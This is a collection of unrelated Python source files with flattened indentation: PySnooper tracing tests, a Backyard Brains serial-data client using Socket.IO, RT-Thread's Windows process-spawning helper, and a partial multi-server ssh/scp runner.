return f4(a)
return f3(a)
def f1(a):
with pysnooper.snoop(string_io, depth=4, normalize=normalize):
result1 = f2(a)
return result1
result = f1(42)
assert result == 42
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result1 = f2(a)'),
VariableEntry(),
CallEntry('def f2(a):'),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry("a"),
CallEntry('def f3(a):'),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
VariableEntry("x"),
CallEntry('def f4(a):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_var_order(normalize):
string_io = io.StringIO()
def f(one, two, three, four):
five = None
six = None
seven = None
five, six, seven = 5, 6, 7
with pysnooper.snoop(string_io, depth=2, normalize=normalize):
result = f(1, 2, 3, 4)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result = f(1, 2, 3, 4)'),
VariableEntry("one", "1"),
VariableEntry("two", "2"),
VariableEntry("three", "3"),
VariableEntry("four", "4"),
CallEntry('def f(one, two, three, four):'),
LineEntry(),
VariableEntry("five"),
LineEntry(),
VariableEntry("six"),
LineEntry(),
VariableEntry("seven"),
LineEntry(),
VariableEntry("five", "5"),
VariableEntry("six", "6"),
VariableEntry("seven", "7"),
ReturnEntry(),
ReturnValueEntry(),
ElapsedTimeEntry(),
),
normalize=normalize,
)
def test_truncate():
max_length = 20
for i in range(max_length * 2):
string = i * 'a'
truncated = truncate(string, max_length)
if len(string) <= max_length:
assert string == truncated
else:
assert truncated == 'aaaaaaaa...aaaaaaaaa'
assert len(truncated) == max_length
def test_indentation():
from .samples import indentation, recursion
assert_sample_output(indentation)
assert_sample_output(recursion)
def test_exception():
from .samples import exception
assert_sample_output(exception)
def test_generator():
string_io = io.StringIO()
original_tracer = sys.gettrace()
original_tracer_active = lambda: (sys.gettrace() is original_tracer)
@pysnooper.snoop(string_io)
def f(x1):
assert not original_tracer_active()
x2 = (yield x1)
assert not original_tracer_active()
x3 = 'foo'
assert not original_tracer_active()
x4 = (yield 2)
assert not original_tracer_active()
return
assert original_tracer_active()
generator = f(0)
assert original_tracer_active()
first_item = next(generator)
assert original_tracer_active()
assert first_item == 0
second_item = generator.send('blabla')
assert original_tracer_active()
assert second_item == 2
with pytest.raises(StopIteration) as exc_info:
generator.send('looloo')
assert original_tracer_active()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x1', '0'),
VariableEntry(),
CallEntry(),
LineEntry(),
VariableEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('0'),
ElapsedTimeEntry(),
# Pause and resume:
VariableEntry('x1', '0'),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry('x2', "'blabla'"),
LineEntry(),
LineEntry(),
VariableEntry('x3', "'foo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('2'),
ElapsedTimeEntry(),
# Pause and resume:
VariableEntry('x1', '0'),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry('x4', "'looloo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(None),
ElapsedTimeEntry(),
)
)
@pytest.mark.parametrize("normalize", (True, False))
def test_custom_repr(normalize):
string_io = io.StringIO()
def large(l):
return isinstance(l, list) and len(l) > 5
def print_list_size(l):
return 'list(size={})'.format(len(l))
def print_dict(d):
return 'dict(keys={})'.format(sorted(list(d.keys())))
def evil_condition(x):
return large(x) or isinstance(x, dict)
@pysnooper.snoop(string_io, custom_repr=(
(large, print_list_size),
(dict, print_dict),
(evil_condition, lambda x: 'I am evil')),
normalize=normalize,)
def sum_to_x(x):
l = list(range(x))
a = {'1': 1, '2': 2}
return sum(l)
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '10000'),
CallEntry(),
LineEntry(),
VariableEntry('l', 'list(size=10000)'),
LineEntry(),
VariableEntry('a', "dict(keys=['1', '2'])"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('49995000'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_custom_repr_single(normalize):
string_io = io.StringIO()
@pysnooper.snoop(string_io, custom_repr=(list, lambda l: 'foofoo!'), normalize=normalize)
def sum_to_x(x):
l = list(range(x))
return 7
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '10000'),
CallEntry(),
LineEntry(),
VariableEntry('l', 'foofoo!'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('7'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
def test_disable():
string_io = io.StringIO()
def my_function(foo):
x = 7
y = 8
return x + y
with mini_toolbox.TempValueSetter((pysnooper.tracer, 'DISABLED'), True):
tracer = pysnooper.snoop(string_io)
with tracer:
result = my_function('baba')
my_decorated_function = tracer(my_function)
my_decorated_function('booboo')
output = string_io.getvalue()
assert not output
@pytest.mark.parametrize("normalize", (True, False))
def test_class(normalize):
string_io = io.StringIO()
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self.x = 7
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.+MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
VariableEntry('self', value_regex="u?.+MyClass object"),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_method(self, foo):'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + self.x'),
ReturnEntry('return y + self.x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_class_with_decorated_method(normalize):
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.+MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
VariableEntry('args', value_regex=r"\(<.+>, 'baba'\)"),
VariableEntry('kwargs', value_regex=r"\{\}"),
VariableEntry('function', value_regex="u?.+my_method"),
CallEntry('def wrapper(*args, **kwargs):'),
LineEntry('result = function(*args, **kwargs)'),
VariableEntry('result', '15'),
LineEntry('return result'),
ReturnEntry('return result'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_class_with_decorated_method_and_snoop_applied_to_method(normalize):
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
@pysnooper.snoop(string_io, normalize=normalize)
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
VariableEntry('args', value_regex=r"u?\(<.+>, 'baba'\)"),
VariableEntry('kwargs', value_regex=r"u?\{\}"),
VariableEntry('function', value_regex="u?.*my_method"),
CallEntry('def wrapper(*args, **kwargs):'),
LineEntry('result = function(*args, **kwargs)'),
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_method(self, foo):'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + self.x'),
ReturnEntry('return y + self.x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
VariableEntry('result', '15'),
LineEntry('return result'),
ReturnEntry('return result'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_class_with_property(normalize):
string_io = io.StringIO()
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self._x = 0
def plain_method(self):
pass
@property
def x(self):
self.plain_method()
return self._x
@x.setter
def x(self, value):
self.plain_method()
self._x = value
@x.deleter
def x(self):
self.plain_method()
del self._x
instance = MyClass()
# Do simple property operations, make sure we didn't mess up the normal behavior
result = instance.x
assert result == instance._x
instance.x = 1
assert instance._x == 1
del instance.x
with pytest.raises(AttributeError):
instance._x
# The property methods will not be traced, but their calls to plain_method will be.
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self._x = 0'),
ReturnEntry('self._x = 0'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
# Called from getter
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
# Called from setter
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
# Called from deleter
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_snooping_on_class_does_not_cause_base_class_to_be_snooped(normalize):
string_io = io.StringIO()
class UnsnoopedBaseClass(object):
def __init__(self):
self.method_on_base_class_was_called = False
def method_on_base_class(self):
self.method_on_base_class_was_called = True
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(UnsnoopedBaseClass):
def method_on_child_class(self):
self.method_on_base_class()
instance = MyClass()
assert not instance.method_on_base_class_was_called
instance.method_on_child_class()
assert instance.method_on_base_class_was_called
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def method_on_child_class(self):'),
LineEntry('self.method_on_base_class()'),
ReturnEntry('self.method_on_base_class()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
def test_normalize():
string_io = io.StringIO()
class A:
def __init__(self, a):
self.a = a
@pysnooper.snoop(string_io, normalize=True)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
add()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry('test_pysnooper.py'),
VariableEntry('A', value_regex=r"<class .*\.A.?>"),
CallEntry('def add():'),
LineEntry('a = A(19)'),
VariableEntry('a', value_regex=r"<.*\.A (?:object|instance)>"),
LineEntry('b = A(22)'),
VariableEntry('b', value_regex=r"<.*\.A (?:object|instance)>"),
LineEntry('res = a.a + b.a'),
VariableEntry('res', value="41"),
LineEntry('return res'),
ReturnEntry('return res'),
ReturnValueEntry('41'),
ElapsedTimeEntry(),
)
)
def test_normalize_prefix():
string_io = io.StringIO()
_prefix = 'ZZZZ'
class A:
def __init__(self, a):
self.a = a
@pysnooper.snoop(string_io, normalize=True, prefix=_prefix)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
add()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry('test_pysnooper.py', prefix=_prefix),
VariableEntry('A', value_regex=r"<class .*\.A.?>", prefix=_prefix),
CallEntry('def add():', prefix=_prefix),
LineEntry('a = A(19)', prefix=_prefix),
VariableEntry('a', value_regex=r"<.*\.A (?:object|instance)>", prefix=_prefix),
LineEntry('b = A(22)', prefix=_prefix),
VariableEntry('b', value_regex=r"<.*\.A (?:object|instance)>", prefix=_prefix),
LineEntry('res = a.a + b.a', prefix=_prefix),
VariableEntry('res', value="41", prefix=_prefix),
LineEntry('return res', prefix=_prefix),
ReturnEntry('return res', prefix=_prefix),
ReturnValueEntry('41', prefix=_prefix),
ElapsedTimeEntry(prefix=_prefix),
)
)
def test_normalize_thread_info():
string_io = io.StringIO()
class A:
def __init__(self, a):
self.a = a
@pysnooper.snoop(string_io, normalize=True, thread_info=True)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
with pytest.raises(NotImplementedError):
add()
|
spikerClient.py
|
# Backyard Brains Sep. 2019
# Made for python 3
# First install the required libraries (numpy, pyserial, matplotlib; the
# SocketIO client used below also needs python-socketio)
# pip3 install pyserial numpy matplotlib python-socketio
#
# Code will read, parse and display data from BackyardBrains' serial devices
#
# Written by Stanislav Mircic
# [email protected]
import threading
import serial
import time
import matplotlib.pyplot as plt
import numpy as np
from datetime import datetime
import socketio
global connected
connected = False
#change name of the port here
#port = 'COM4'
#port = '/dev/ttyUSB0'
port = '/dev/cu.usbserial-DO015D1O'
baud = 230400
global input_buffer
global sample_buffer
global dataframe
global cBufTail
cBufTail = 0
input_buffer = []
#sample_rate = 10000
#display_size = 30000 #3 seconds
sample_rate = 200
display_size = 600
sample_buffer = np.linspace(0,0,display_size)
serial_port = serial.Serial(port, baud, timeout=0)
last_time_recorded = 0
dataframe = np.array([0,0])
# Code updated with SocketIO
# First install SocketIO
# Written by Rodrigo Sanz Sep. 2020
# [email protected]
sio = socketio.Client()
num = 0
@sio.event
def connect():
print('connection established')
sio.emit('my event', {'data': 'Emit Test Event from here'})
@sio.event
def my_message(data):
global num
global dataframe
global last_time_recorded
print('message received with ', data)
if data == "START SESSION":
print("Reset Variables")
last_time_recorded = 0
dataframe = np.array([0,0])
if data == "END SESSION":
print("Saving CSV")
num = num + 1
strTemp = 'modulo' + str(num) + '.csv'
np.savetxt(strTemp, dataframe, delimiter=',', header='time,data')
sio.emit('my response', {'response': 'my response'})
@sio.event
def disconnect():
print('disconnected from server')
# End Code updated with SocketIO
# Original Code
def checkIfNextByteExist():
global cBufTail
global input_buffer
tempTail = cBufTail + 1
if tempTail==len(input_buffer):
return False
return True
def checkIfHaveWholeFrame():
global cBufTail
global input_buffer
tempTail = cBufTail + 1
while tempTail!=len(input_buffer):
nextByte = input_buffer[tempTail] & 0xFF
if nextByte > 127:
return True
tempTail = tempTail +1
return False
def areWeAtTheEndOfFrame():
global cBufTail
global input_buffer
tempTail = cBufTail + 1
nextByte = input_buffer[tempTail] & 0xFF
if nextByte > 127:
return True
return False
def numberOfChannels():
return 1
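# Frame format, as implemented in handle_data below: each sample arrives as a
# pair of 7-bit bytes, and a byte with the high bit set (value > 127) marks the
# start of a new frame. A sample is decoded as ((MSB & 0x7F) << 7) | (LSB & 0x7F),
# then 512 is subtracted to centre the value around zero.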
def handle_data(data):
global input_buffer
global cBufTail
global sample_buffer
global dataframe
global last_time_recorded
if len(data)>0:
cBufTail = 0
haveData = True
weAlreadyProcessedBeginingOfTheFrame = False
numberOfParsedChannels = 0
while haveData:
MSB = input_buffer[cBufTail] & 0xFF
if(MSB > 127):
weAlreadyProcessedBeginingOfTheFrame = False
numberOfParsedChannels = 0
if checkIfHaveWholeFrame():
while True:
MSB = input_buffer[cBufTail] & 0xFF
if(weAlreadyProcessedBeginingOfTheFrame and (MSB>127)):
#we found the beginning of a new frame inside the current frame
#something is wrong
break #continue as if we have new frame
MSB = input_buffer[cBufTail] & 0x7F
weAlreadyProcessedBeginingOfTheFrame = True
cBufTail = cBufTail +1
LSB = input_buffer[cBufTail] & 0xFF
if LSB>127:
break #continue as if we have new frame
LSB = input_buffer[cBufTail] & 0x7F
MSB = MSB<<7
writeInteger = LSB | MSB
numberOfParsedChannels = numberOfParsedChannels+1
if numberOfParsedChannels>numberOfChannels():
#we have more data in frame than we need
#something is wrong with this frame
break #continue as if we have new frame
this_sample = writeInteger-512
sample_buffer = np.append(sample_buffer, this_sample)
time_now = datetime.now().timestamp()
time_elapsed = float("{:.6f}".format(time_now-time_start))
if (time_elapsed > last_time_recorded + 0.002):
dataframe = np.vstack((dataframe, [time_elapsed, this_sample]))
last_time_recorded = time_elapsed
#print("print")
#dataframe = np.vstack((dataframe, [time_elapsed, this_sample]))
#print(dataframe)
if areWeAtTheEndOfFrame():
break
else:
cBufTail = cBufTail +1
else:
haveData = False
break
if(not haveData):
break
cBufTail = cBufTail +1
if cBufTail==len(input_buffer):
haveData = False
break
def read_from_port(ser):
global connected
global input_buffer
while not connected:
#serin = ser.read()
connected = True
while True:
reading = ser.read(1024)
if(len(reading)>0):
reading = list(reading)
#here we overwrite the buffer, discarding any partial frame left over from the previous read
#should be changed
input_buffer = reading.copy()
#print("len(reading)",len(reading))
handle_data(reading)
time.sleep(0.005)
thread = threading.Thread(target=read_from_port, args=(serial_port,))
time_start = datetime.now().timestamp()
thread.start()
xi = np.linspace(-display_size/sample_rate, 0, num=display_size)
#Plot values with matplotlib
""" while True:
plt.ion()
plt.show(block=False)
if(len(sample_buffer)>0):
#i = len(sample_buffer)
#print(len(sample_buffer))
yi = sample_buffer.copy()
yi = yi[-display_size:]
#sample_buffer = sample_buffer[-display_size:]
#print(sample_buffer)
plt.clf()
plt.ylim(-550, 550)
plt.plot(xi, yi, linewidth=1, color='royalblue')
plt.pause(0.001)
time.sleep(0.08)
"""
sio.connect('http://localhost:5000')
#io.wait()
|
win32spawn.py
|
#
# File : win32spawn.py
# This file is part of RT-Thread RTOS
# COPYRIGHT (C) 2006 - 2015, RT-Thread Development Team
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Change Logs:
# Date Author Notes
# 2015-01-20 Bernard Add copyright information
#
import os
import threading
import sys
_PY2 = sys.version_info[0] < 3
if _PY2:
import Queue
else:
import queue as Queue
# Windows import
import win32file
import win32pipe
import win32api
import win32con
import win32security
import win32process
import win32event
class Win32Spawn(object):
def __init__(self, cmd, shell=False):
self.queue = Queue.Queue()
self.is_terminated = False
self.wake_up_event = win32event.CreateEvent(None, 0, 0, None)
exec_dir = os.getcwd()
comspec = os.environ.get("COMSPEC", "cmd.exe")
cmd = comspec + ' /c ' + cmd
win32event.ResetEvent(self.wake_up_event)
currproc = win32api.GetCurrentProcess()
sa = win32security.SECURITY_ATTRIBUTES()
sa.bInheritHandle = 1
child_stdout_rd, child_stdout_wr = win32pipe.CreatePipe(sa, 0)
child_stdout_rd_dup = win32api.DuplicateHandle(currproc, child_stdout_rd, currproc, 0, 0, win32con.DUPLICATE_SAME_ACCESS)
win32file.CloseHandle(child_stdout_rd)
child_stderr_rd, child_stderr_wr = win32pipe.CreatePipe(sa, 0)
child_stderr_rd_dup = win32api.DuplicateHandle(currproc, child_stderr_rd, currproc, 0, 0, win32con.DUPLICATE_SAME_ACCESS)
win32file.CloseHandle(child_stderr_rd)
child_stdin_rd, child_stdin_wr = win32pipe.CreatePipe(sa, 0)
child_stdin_wr_dup = win32api.DuplicateHandle(currproc, child_stdin_wr, currproc, 0, 0, win32con.DUPLICATE_SAME_ACCESS)
win32file.CloseHandle(child_stdin_wr)
startup_info = win32process.STARTUPINFO()
startup_info.hStdInput = child_stdin_rd
startup_info.hStdOutput = child_stdout_wr
startup_info.hStdError = child_stderr_wr
startup_info.dwFlags = win32process.STARTF_USESTDHANDLES
cr_flags = 0
cr_flags = win32process.CREATE_NEW_PROCESS_GROUP
env = os.environ.copy()
self.h_process, h_thread, dw_pid, dw_tid = win32process.CreateProcess(None, cmd, None, None, 1,
cr_flags, env, os.path.abspath(exec_dir),
startup_info)
win32api.CloseHandle(h_thread)
win32file.CloseHandle(child_stdin_rd)
win32file.CloseHandle(child_stdout_wr)
win32file.CloseHandle(child_stderr_wr)
self.__child_stdout = child_stdout_rd_dup
self.__child_stderr = child_stderr_rd_dup
self.__child_stdin = child_stdin_wr_dup
self.exit_code = -1
def close(self):
win32file.CloseHandle(self.__child_stdout)
win32file.CloseHandle(self.__child_stderr)
win32file.CloseHandle(self.__child_stdin)
win32api.CloseHandle(self.h_process)
win32api.CloseHandle(self.wake_up_event)
def kill_subprocess(self):
win32event.SetEvent(self.wake_up_event)
def sleep(self, secs):
win32event.ResetEvent(self.wake_up_event)
timeout = int(1000 * secs)
val = win32event.WaitForSingleObject(self.wake_up_event, timeout)
if val == win32event.WAIT_TIMEOUT:
return True
else:
# The wake_up_event must have been signalled
return False
def get(self, block=True, timeout=None):
return self.queue.get(block=block, timeout=timeout)
def qsize(self):
return self.queue.qsize()
def __wait_for_child(self):
# kick off threads to read from stdout and stderr of the child process
threading.Thread(target=self.__do_read, args=(self.__child_stdout, )).start()
threading.Thread(target=self.__do_read, args=(self.__child_stderr, )).start()
while True:
# block waiting for the process to finish or the interrupt to happen
handles = (self.wake_up_event, self.h_process)
val = win32event.WaitForMultipleObjects(handles, 0, win32event.INFINITE)
if val >= win32event.WAIT_OBJECT_0 and val < win32event.WAIT_OBJECT_0 + len(handles):
handle = handles[val - win32event.WAIT_OBJECT_0]
if handle == self.wake_up_event:
win32api.TerminateProcess(self.h_process, 1)
win32event.ResetEvent(self.wake_up_event)
return False
elif handle == self.h_process:
# the process has ended naturally
return True
else:
assert False, "Unknown handle fired"
else:
assert False, "Unexpected return from WaitForMultipleObjects"
# Wait for the job to finish. Since this method blocks, it should be called from another thread.
# If the application wants to kill the process, it should call kill_subprocess().
def wait(self):
if not self.__wait_for_child():
# it's been killed
result = False
else:
# normal termination
self.exit_code = win32process.GetExitCodeProcess(self.h_process)
result = self.exit_code == 0
self.close()
self.is_terminated = True
return result
# This method gets called on a worker thread to read from either the stderr
# or stdout pipe of the child process.
def __do_read(self, handle):
bytesToRead = 1024
while 1:
try:
finished = 0
hr, data = win32file.ReadFile(handle, bytesToRead, None)
if data:
self.queue.put_nowait(data)
except win32api.error:
finished = 1
if finished:
return
def start_pipe(self):
def worker(pipe):
return pipe.wait()
thrd = threading.Thread(target=worker, args=(self, ))
thrd.start()
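# A minimal usage sketch, assuming a Windows host with pywin32 installed; the
# 'dir' command below is only an example (it is run through COMSPEC, see __init__).
if __name__ == '__main__':
    spawn = Win32Spawn('dir')
    spawn.start_pipe()  # wait() runs on a worker thread, see start_pipe() above
    while not spawn.is_terminated or spawn.qsize():
        try:
            print(spawn.get(block=True, timeout=0.5))
        except Queue.Empty:
            pass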
|
ssh.py
|
#!/usr/bin/env python2
import sys
import os
from subprocess import Popen, PIPE
import Queue
import threading
import re
import datetime
class Ssh:
'''This class can access multiple servers via ssh and scp (in both directions)'''
def __init__(self):
'''Run all setup methods, which collect the data needed for threading'''
self.args = dict()
self._get_args()
self.test = int(self.args.get('test', 0))
self.script_config_file = './ssh.py_config'
self._get_args()
self._parse_ssh_py_config()
self._parse_hosts_config()
self._determine_mode()
if self.test:
for serv in self.servers:
command = self._ssh_make_cmd(serv)
print serv, command
sys.exit()
self._prepare_threading()
def _parse_ssh_py_config(self):
'''Parse ssh.py config'''
data = dict()
pat = re.compile(r'([0-9a-zA-Z\_\-\s]+)=(.*)')
if not os.path.isfile(self.script_config_file):
if self.debug:
print('No config file')
return
with open(self.script_config_file) as conf:
for line in conf:
if line.startswith('#'):
continue
parsed = pat.search(line)
if parsed:
key = parsed.group(1).strip()
val = parsed.group(2).strip()
data[key] = val
for key in data:
if key not in self.args:
self.args[key] = data[key]
if self.debug:
print('args from config', data)
print('args from config + cmd', self.args)
def _get_args(self):
'''Parse args'''
data = dict()
for (num,arg) in enumerate(sys.argv[1:], start=1):
tmp_arg = arg.split('=')
if len(tmp_arg) == 2:
key = tmp_arg[0]
val = tmp_arg[1]
else:
key = 'arg' + str(num)
val = arg
data[key] = val
self.args[key] = val
self.debug = int(self.args.get('debug', 0))
if self.debug:
print('args from cmd', data)
def _parse_hosts_config(self):
'''Parse the ansible-style hosts inventory file'''
servers_lists = self.servers_lists = dict()
inventory_file = self.args.get('config', './hosts')
config = open(inventory_file)
for line in config:
line = line.strip().split(' ')[0]
if line.startswith('#'):
continue
if line:
if line.startswith('['):
group = self.group = line[1:-1]
servers_lists[group] = set()
continue
else:
sl = line.split(']')
if len(sl) == 1:
servers_lists[group].add(line)
continue
elif not all(sl):
res = sl[0].split('[')
num = res[1].split(':')
n1 = int(num[0])
n2 = int(num[1]) + 1
for srv_num in range(n1, n2):
servers_lists[group].add(res[0] + str(srv_num))
continue
elif all(sl):
res = sl[0].split('[') + [sl[1]]
num = res[1].split(':')
n1 = int(num[0])
n2 = int(num[1]) + 1
for srv_num in range(n1, n2):
servers_lists[group].add(res[0] + str(srv_num) + res[2])
continue
if self.debug:
print('hosts', self.servers_lists)
def _determine_mode(self):
'''Determine ssh or scp mode and build the resulting servers list for that mode'''
ssh_pat = re.compile(r'^((?P<user>[a-zA-Z0-9\_\-]+)@)?(?P<servers>[a-zA-Z0-9\_\,\.\[\]\*\+\(\)\{\}\?\^\$\|\-]+)')
scp_pat = re.compile(r'^((?P<user>[a-zA-Z0-9\_\-]+)@)?(?P<servers>[a-zA-Z0-9\_\,\.\[\]\*\+\(\)\{\}\?\^\$\-]+):(?P<path>[a-zA-Z0-9_\.\/\-]+)$')
self.mode = self.args.get('mode', 'ssh')
if self.mode == 'ssh':
result = ssh_pat.match(self.args.get('arg1', '')).groupdict()
self.user = result['user']
if not self.user:
self.user = self.args.get('user', 'root')
self.command = self.args.get('arg2', 'uname')
tmp_servers = result['servers'].split(',')
if self.debug:
print('mode', self.mode)
print('tmp_servers', tmp_servers)
self._match_servers(tmp_servers)
elif self.mode == 'scp':
if self.args['arg1'].find(':') != -1:
self.direction = 'from'
result = scp_pat.match(self.args.get('arg1', '')).groupdict()
self.src = result['path']
if not self.src:
self.src = './tst'
self.dst = self.args.get('arg2', './')
elif self.args['arg2'].find(':') != -1:
self.direction = 'to'
result = scp_pat.match(self.args.get('arg2', '')).groupdict()
self.dst = result['path']
if not self.dst:
self.dst = './tst'
self.src = self.args.get('arg1', './')
self.user = result['user']
if not self.user:
self.user = self.args.get('user', 'root')
tmp_servers = result['servers'].split(',')
if self.debug:
print('mode', self.mode)
print('tmp_servers', tmp_servers)
self._match_servers(tmp_servers)
def _match_servers(self, tmp_servers):
'''Build the final servers list from hosts, groups and regexes in the inventory, plus hosts given on the command line that are not in the inventory'''
self.servers = set()
re_tmp_servers = set()
re_chars = '^${}[]*+|()?'
if not tmp_servers:
tmp_servers = self.args.get('servers', 'localhost').split(',')
for server in tmp_servers:
# check if server name contains regex
for c in re_chars:
if server.find(c) != -1:
regex = 1
re_tmp_servers.add(server)
break
else:
regex = 0
if regex:
regex = 0
continue
# select all servers if server name = all
if server == 'all':
for group in self.servers_lists:
self.servers = self.servers.union(self.servers_lists[group])
continue
# if server name match group - add hosts in group
if server in self.servers_lists:
self.servers = self.servers.union(self.servers_lists[server])
# if host not in config - add as is
else:
self.servers.add(server)
# if any entry in the list is a regex, only the non-regex servers that match it will end up in the resulting list
regex_servers = set()
if self.debug:
print('re_tmp_servers', re_tmp_servers)
if re_tmp_servers:
for server in re_tmp_servers:
srv_pat = re.compile(r'%s' % (server))
for srv in self.servers:
if srv_pat.search(srv):
regex_servers.add(srv)
self.servers = regex_servers
if self.debug:
print('regex_servers', regex_servers)
print('servers', self.servers)
def _prepare_threading(self):
'''Prepare storage and options for threading'''
self.async = int(self.args.get('async', 0))
self.threads = range(1, int(self.args.get('threads', 100)) + 1)
self.ssh_out = { 'stdout': {}, 'stderr': {} }
self.ssh_out_tmp = dict()
self.queue = Queue.Queue()
def _ssh_make_cmd(self, server):
'''Assemble final ssh command for Popen'''
if self.mode == 'ssh':
command = ['ssh', self.user + '@' + server, self.command]
elif self.mode == 'scp':
if self.direction == 'to':
command = ['scp', self.src, self.user + '@' + server + ':' + self.dst]
elif self.direction == 'from':
command = ['scp', self.user + '@' + server + ':' + self.src, self.dst + '_' + server]
ssh_options = self.args.get('ssh_options', 'ConnectTimeout=10').split()
for opt in ssh_options:
command.insert(1, '-o')
command.insert(2, opt)
prefix = self.args.get('ssh_prefix', '')
if prefix:
command.insert(0, prefix)
return command
def ssh(self, num):
'''Run ssh or scp to server from list by threads'''
try:
queue = self.queue
while True:
server = queue.get()
command = self._ssh_make_cmd(server)
if num == 1 and self.debug:
print 'command:', command
proc0 = Popen(command, stdout=PIPE, stderr=PIPE)
proc = proc0.communicate()
if proc[0]:
proc_stdout = proc[0].split('\n')[:-1]
self.ssh_out_tmp[num]['stdout'][server] = proc_stdout
if self.async:
for line in proc_stdout:
print server + ' ' + line
if proc[1]:
